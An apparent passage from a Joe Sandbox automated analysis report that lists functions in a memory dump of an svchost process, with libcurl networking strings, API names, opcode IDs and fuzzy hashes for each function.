                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: __acrt_iob_funcmemmovestrchr
                                                                • String ID: Failed to encode DoH packet [%d]$https
                                                                • API String ID: 4033746602-1520151043
                                                                • Opcode ID: e4c5fd03ec8ce9b657c010176a12e4d723095ae9b07db94a24dc2a9c833f3eb5
                                                                • Instruction ID: a4b01a71ed88ce9d7d884af889f83d976249c415d563275707cee2e6f6b9f27b
                                                                • Opcode Fuzzy Hash: e4c5fd03ec8ce9b657c010176a12e4d723095ae9b07db94a24dc2a9c833f3eb5
                                                                • Instruction Fuzzy Hash: 0402F07A21979001EB349A90D8487FEE764EB41FC8FD58625DE2E077C2FB25C641A380
                                                                Function 00000173D01AE3E0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE366
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE387
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE3A2
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE3B0
                                                                  • Part of subcall function 00000173D01AE340: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01AE3C2
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,HTTP,00000173D017E5CD,00000173D0153E76), ref: 00000173D01AE46C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$malloc
                                                                • String ID: HTTP$NTLM$SSPI: could not get auth info
                                                                • API String ID: 2190258309-1428047303
                                                                • Opcode ID: a707bc4b4b0493cab4ba14752b9b29a423daba1bd5b33d879bead69c4d2b8401
                                                                • Instruction ID: 8b12e2c79b40f9d9ed6cb3de8c9723e26dcda0f4a6a673466b49f31e70dbbef1
                                                                • Opcode Fuzzy Hash: a707bc4b4b0493cab4ba14752b9b29a423daba1bd5b33d879bead69c4d2b8401
                                                                • Instruction Fuzzy Hash: 4461483A208B8086EB708F55E48039AB7F5F788FC4F944425DA9D43B68EF38C655EB40
                                                                Function 00000173D016D560 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 144stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strstr
                                                                • String ID: bytes$Data conn was not available immediately$Getting file with size: %lld$Maxdownload = %lld$RETR response: %03d
                                                                • API String ID: 1392478783-1361617395
                                                                • Opcode ID: 7ed2df5fb296cb3b7918dc729f437e95104ca142180c5a307f7952e46ce5bb40
                                                                • Instruction ID: b9e94e55241006d06a6e06b84fce022b8809052a8fcf234e96eb8739f6863228
                                                                • Opcode Fuzzy Hash: 7ed2df5fb296cb3b7918dc729f437e95104ca142180c5a307f7952e46ce5bb40
                                                                • Instruction Fuzzy Hash: B751F87AE0868045FB7597A9EC053EDE2B0D385FE4FD80221DA7D066D6FB28C780A300
                                                                Function 00000173D01AC340 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 127stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: strchr$strstr
                                                                • String ID: %$%20$0123456789abcdef
                                                                • API String ID: 1654209344-876311552
                                                                • Opcode ID: 1961a64fb4a6ab28c183b2990609a5b1363807b83975f49ecd1153e7572903c5
                                                                • Instruction ID: 0168c73a927905c485cc3a17759afba4fb7ae88178947c9ccfa7f5d6996ee792
                                                                • Opcode Fuzzy Hash: 1961a64fb4a6ab28c183b2990609a5b1363807b83975f49ecd1153e7572903c5
                                                                • Instruction Fuzzy Hash: F841792970C28509FE3296A6D4203FAD6A1B708FE4FC84221DD7E57BC5F728CA47A304
                                                                Function 00000173D0173460 Relevance: 7.7, APIs: 6, Instructions: 213stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memmovestrchr$calloc
                                                                • String ID:
                                                                • API String ID: 2412758169-0
                                                                • Opcode ID: 2fa393d124ef89bde96e505b8582a5e2ed7aa2abe3123bfcf398ad2d1efb8800
                                                                • Instruction ID: 54977c150f2e2ef69ad4837dc48bfe057aefc7007928a4c12294a2c902fa88a2
                                                                • Opcode Fuzzy Hash: 2fa393d124ef89bde96e505b8582a5e2ed7aa2abe3123bfcf398ad2d1efb8800
                                                                • Instruction Fuzzy Hash: 1681D47A20C69499FB75CAA5D1443E9EBF5A785FC4FE80111EAAD073C1F728C792A300
                                                                Function 00000173D01796A0 Relevance: 7.6, APIs: 6, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D01796EC
                                                                • memmove.VCRUNTIME140(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017970A
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017976B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179775
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017977F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017979A
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$callocmemmove
                                                                • String ID:
                                                                • API String ID: 2309541529-0
                                                                • Opcode ID: 572deabb6b8290a8f7ffaca18cab45e40f293e6de7533773985693bb88463552
                                                                • Instruction ID: 33dda55792b15bb7e5c9f3cdd5c4e2db79a9b919446b8b5374ebdcf21d47b8c9
                                                                • Opcode Fuzzy Hash: 572deabb6b8290a8f7ffaca18cab45e40f293e6de7533773985693bb88463552
                                                                • Instruction Fuzzy Hash: EC312C39219A4082EA24DF96E85039DA3B4FBC8FD4F940125AEAD07B59FF38CA45D740
                                                                Function 00000173D0152800 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionfree$EnterLeaveclosesocket
                                                                • String ID:
                                                                • API String ID: 240345047-0
                                                                • Opcode ID: 4cea47bae9313296a911b173c89c3e3574eeee76c9b46606255648ab9b2db02e
                                                                • Instruction ID: 036d07b99b9f782c383d9fdb94962993671756cf00cf5379283cc7971ff5716a
                                                                • Opcode Fuzzy Hash: 4cea47bae9313296a911b173c89c3e3574eeee76c9b46606255648ab9b2db02e
                                                                • Instruction Fuzzy Hash: 9B11293A208A0087E7249F92E58439EB3B0F78AFD0F840121DF6E07B54EF78D5A5A710
                                                                Function 00000173D01B6865 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: %s: %s$Serial Number$Signature Algorithm
                                                                • API String ID: 356670603-1527603233
                                                                • Opcode ID: d39f760e66e6e89a809a7dbd22f4cd13c6f27c08643c5210298e3da13c489cfa
                                                                • Instruction ID: 1121c2dc2ec92d45a828d7e9614b9ee342409bd1d004a725790979f963897d7b
                                                                • Opcode Fuzzy Hash: d39f760e66e6e89a809a7dbd22f4cd13c6f27c08643c5210298e3da13c489cfa
                                                                • Instruction Fuzzy Hash: 94418A7A30878685EB329BE1D8503E9A7B1B756FC4FC40515AEAD5778AFB38C640E340
                                                                Function 00000173D01564A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastrecv
                                                                • String ID: Recv failure: %s$recv(len=%zu) -> %d, err=%d
                                                                • API String ID: 2514157807-2495832097
                                                                • Opcode ID: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                • Instruction ID: c863433f2ada0e6218f0e71fdd939a4224aad970e8de5f7617323a4ef2d6173e
                                                                • Opcode Fuzzy Hash: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                • Instruction Fuzzy Hash: A631D4762086808AE6359F96E8547E9F7B0B789FD4F844115AEAD0B795FB3CC281DB00
                                                                Function 00000173D01784E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup
                                                                • String ID: Last-Modified:$Location:
                                                                • API String ID: 2653869212-3815226001
                                                                • Opcode ID: fac2aac935aee08a2f2fa3627afe3cb91424137be28187364b23d06d483cc389
                                                                • Instruction ID: d2fb139582f1bb5de3822a70caac505d8b6d6a6652c8366d541edafe5c0d0f6a
                                                                • Opcode Fuzzy Hash: fac2aac935aee08a2f2fa3627afe3cb91424137be28187364b23d06d483cc389
                                                                • Instruction Fuzzy Hash: AE318F7924D780C5FB719BA5D4043E8A2B0D786FDAF8804358E2D4B6D5FB28CA80EB15
                                                                Function 00000173D01A4710 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdup
                                                                • String ID: Connection died, retrying a fresh connect (retry count: %d)$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
                                                                • API String ID: 1169197092-4242497519
                                                                • Opcode ID: a1902d478be4f8422c5172883111271925af11bc5d3f7a20674d84e107390f10
                                                                • Instruction ID: 496ef429f503f49f5a27296896a997ac3d1dde4e1228464814b0cac56eb5d5ee
                                                                • Opcode Fuzzy Hash: a1902d478be4f8422c5172883111271925af11bc5d3f7a20674d84e107390f10
                                                                • Instruction Fuzzy Hash: 73318D3A6096D082F7668B99E4443D9B7B0F785FC8F884034EB6D0B795EB29C696D700
                                                                Function 00000173D01A3460 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _time64
                                                                • String ID: Connection time-out$gfff$set timeouts for state %d; Total % lld, retry %d maxtry %d
                                                                • API String ID: 1670930206-2826722092
                                                                • Opcode ID: dbf2721e6b1ab55ce9c62074772d5bbaf42ee43c46be42273c0cc3afc3a17f35
                                                                • Instruction ID: 2562e53b827272c70aa227bd196cd2893ded4820d695cfd6c6c618fe9afd2267
                                                                • Opcode Fuzzy Hash: dbf2721e6b1ab55ce9c62074772d5bbaf42ee43c46be42273c0cc3afc3a17f35
                                                                • Instruction Fuzzy Hash: 5B21077972421586EB34CFAAE4017D9A7B0F358FC8F901412ED1D8B784F779C2529700
                                                                Function 00000173D01AC510 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Versionmemmovezlib
                                                                • String ID: libcurl/8.10.1-DEV$zlib/%s
                                                                • API String ID: 374951376-477685120
                                                                • Opcode ID: dd9bd3c64a7a3ac15a3e76413409a0eea37169667ef86f096f87415fa1e49075
                                                                • Instruction ID: 10d988438a828e0881fb554fe2976b89091eb6d157b26c66ba1e2721aeaa15e6
                                                                • Opcode Fuzzy Hash: dd9bd3c64a7a3ac15a3e76413409a0eea37169667ef86f096f87415fa1e49075
                                                                • Instruction Fuzzy Hash: C4318E3A609B8485E7218F50E4403DAB7B4F389BD4FC45222DAAD23795EB38C606D740
                                                                Function 00000173D0194500 Relevance: 6.3, APIs: 5, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$calloc
                                                                • String ID:
                                                                • API String ID: 3095843317-0
                                                                • Opcode ID: aae62e64d7a478b159b68f52773ff21e0be0dfebdbbd68c2197941eca1024f41
                                                                • Instruction ID: f2e72f774b36b68939903b19cb1315fbcf4a5e15f12b52493230c1284dfbd9d9
                                                                • Opcode Fuzzy Hash: aae62e64d7a478b159b68f52773ff21e0be0dfebdbbd68c2197941eca1024f41
                                                                • Instruction Fuzzy Hash: 51216BB9208B1083FB648FA6F9543A9A2B5AB48FC4F840025DE6E47798FF3CC6459341
                                                                Function 00000173D01AE340 Relevance: 6.3, APIs: 5, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ba293342d94ffe3c8aeb5c9959f4e856eb7cec13775bd3ec34c091d467a898c7
                                                                • Instruction ID: 9e4baf3fd482cc4af6256903c516914dbf11d7d03cb2828e0405cd9a4e7998c6
                                                                • Opcode Fuzzy Hash: ba293342d94ffe3c8aeb5c9959f4e856eb7cec13775bd3ec34c091d467a898c7
                                                                • Instruction Fuzzy Hash: 9711D63A205B4082EB149F69E89026CB3B4FB89FD4F444115CE6E47724EF34C992D750
                                                                Function 00000173D01613C0 Relevance: 6.3, APIs: 5, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 5b8da2930924676327b981dcf17569e15eac1f162896e2a0a93f538f370f3328
                                                                • Instruction ID: f0cb97ca960554ee4739eb376defdd9cb6181a872e621e640e3e557a5db61921
                                                                • Opcode Fuzzy Hash: 5b8da2930924676327b981dcf17569e15eac1f162896e2a0a93f538f370f3328
                                                                • Instruction Fuzzy Hash: 29E0523A219D1182EB649FA6EC9416CA370E78CFA5F4402218E3E46224FF28C996D660
                                                                Function 00000173D017A6E0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memchr
                                                                • String ID: Invalid status line$RTSP/$Received HTTP/0.9 when not allowed
                                                                • API String ID: 3297308162-903287913
                                                                • Opcode ID: cbe728620d90e39a8cb8637eac0b06d9a3a889e952a1e181f7a61fe4b81597c9
                                                                • Instruction ID: 49e5669a0f40c58804dd2902bb66db10bbef3c00a39e5aa28aaef14d4e88bac7
                                                                • Opcode Fuzzy Hash: cbe728620d90e39a8cb8637eac0b06d9a3a889e952a1e181f7a61fe4b81597c9
                                                                • Instruction Fuzzy Hash: 7E51823960C68085FB35DAA2D8153ED96B0A7C6FC4FD440359E6E5B786FF38C64AA301
                                                                Function 00000173D0175520 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_time64memmove
                                                                • String ID:
                                                                • API String ID: 1971662853-0
                                                                • Opcode ID: f8389c08a02813519fde331f50694b02712b134fcce863080d228978a737b810
                                                                • Instruction ID: 7a0d1dfe300cd6020abda8d270144cd773835a579d1be41128ce90b337b5152d
                                                                • Opcode Fuzzy Hash: f8389c08a02813519fde331f50694b02712b134fcce863080d228978a737b810
                                                                • Instruction Fuzzy Hash: 9241D37920D68485FB319BA5D9443EDE6B0A785FE4FC806209E7D037C6FB78C646A700
                                                                Function 00000173D018E7C9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memchr
                                                                • String ID: Got unexpected pop3-server response
                                                                • API String ID: 3297308162-2372289448
                                                                • Opcode ID: f9e41d15f7de78c7c7a9a09fb5e2e5eda402558c9c52b3c7b7a9e4399ca61276
